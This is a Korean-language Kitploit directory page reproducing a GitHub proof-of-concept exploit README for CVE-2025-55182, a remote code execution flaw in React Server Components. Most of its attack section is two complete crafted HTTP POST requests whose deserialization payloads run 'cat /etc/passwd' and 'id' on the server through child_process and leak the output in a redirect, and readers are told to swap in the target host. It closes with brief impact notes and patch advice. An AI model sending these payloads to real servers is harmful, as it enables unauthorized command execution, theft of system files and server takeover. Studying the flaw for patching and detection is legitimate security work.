Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell_cve-2025-55182 — CVE-2025-55182에 대한 개념 증명 익스플로잇으로, 안전하지 않은 요청 역직렬화를 통해 React Server Components에서 원격 코드 실행을 보여줍니다. 침투 테스트를 위한 조작된 HTTP 요청을 포함합니다. | Kitploit
도구/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

CVE-2025-55182에 대한 개념 증명 익스플로잇으로, 안전하지 않은 요청 역직렬화를 통해 React Server Components에서 원격 코드 실행을 보여줍니다. 침투 테스트를 위한 조작된 HTTP 요청을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
8개월 전아직 검토되지 않음

React Server Components RCE - CVE-2025-55182

안녕하세요! 좋은 하루 보내고 계시길 바랍니다! 😊✨

이것은 무엇에 관한 것인가요?

React Server Components 버전 19.0.0, 19.1.0, 19.1.1, 19.2.0에 심각한 보안 문제가 있습니다. react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack 패키지가 영향을 받습니다.

문제는 서버가 요청에서 데이터를 안전하지 않은 방식으로 읽을 때 발생합니다. 공격자는 특수 데이터를 보내 서버가 자신의 명령을 실행하도록 할 수 있습니다.


개념 증명 - 전체 공격 예제

다음은 문제를 보여주는 전체 공격 요청입니다. 명령어는 안전한 예시로 변경했습니다.

target-website.com을 테스트 중인 웹사이트로 바꾸세요.

공격 요청 #1 - 시스템 파일 읽기

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

공격 요청 #2 - 사용자 정보 확인

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

간단한 설명

  1. 서버가 요청에서 데이터를 읽습니다
  2. 잘못된 데이터가 서버를 속여 명령을 실행하게 합니다
  3. 공격자는 원하는 모든 명령을 실행할 수 있습니다
  4. 명령어는 우리가 보내는 데이터에 숨겨져 있습니다

어떤 일이 발생할 수 있나요?

공격자는 다음을 할 수 있습니다:

  • 서버에서 모든 명령 실행
  • 비밀 파일 읽기
  • 서버 제어권 획득
  • 모든 데이터 탈취

해결 방법

즉시 React를 업데이트하세요! 이 문제가 수정된 최신 버전을 받으세요.


유용한 링크

  • 공식 스캐너 도구
  • 기술 세부 사항
  • Facebook 보안 공지
  • OpenWall 보안 목록
  • React 공식 블로그
  • Next.js 보안 공지
  • Vercel 업데이트 공지

잘 지내시고 안전하세요! ✨❤️

도구 다운로드